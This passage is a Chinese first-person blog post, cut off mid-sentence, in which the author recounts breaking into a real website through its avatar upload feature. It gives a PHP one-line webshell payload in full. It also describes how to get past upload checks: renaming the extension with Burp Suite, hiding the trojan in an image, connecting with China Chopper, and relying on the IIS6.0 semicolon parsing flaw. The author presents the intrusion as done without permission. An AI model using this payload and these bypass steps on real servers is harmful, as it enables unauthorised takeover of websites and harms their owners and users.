注:本人是个菜鸟。
一、利用文件上传漏洞获取webshell。
确定要攻击的目标网站。
图上的目标站域名过期了,只能通过ip地址访问。
大概在去年的时候,对目标站实施了入侵,具体如下:
本想着通过sql注入的方式方式爆出用户密码,通过sqlmap扫描注入发现没有注入点,但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。而且有个默认的头像。通过右键查看图片得到当前图片路径。
这回知道了路径。那么就开始吧。
通过浏览目标站,得到目标站使用php语言。先准备一个php一句话木马 <?php @eval($_POST[pp]);?>。直接上传。那肯定是不成功的,校验了后缀格式。那么把 .php一句话木马后缀改为.jpg。在上传,使用brupsuite 抓包 再更改后缀为php,还是失败。既然普通的php码不能上传,那么就制作一个图片一句话木马。在图片里面植入一句话木马。
直接上传制作好的图片木马。提示上传成功。右键查看我们上的木马图片。发现名称已经被替换成14828287266_3_image.jgp 这个。直接复制图片地址,使用中国菜刀进行连接木马,连接失败,不知道啥原因。百度搜索发现 IIS6.0有文件上传解析漏洞 如:1.php;2.jpg,是图片,但是在IIS6.0里解析的时候,是忽略掉分号后面的字串,直接解析为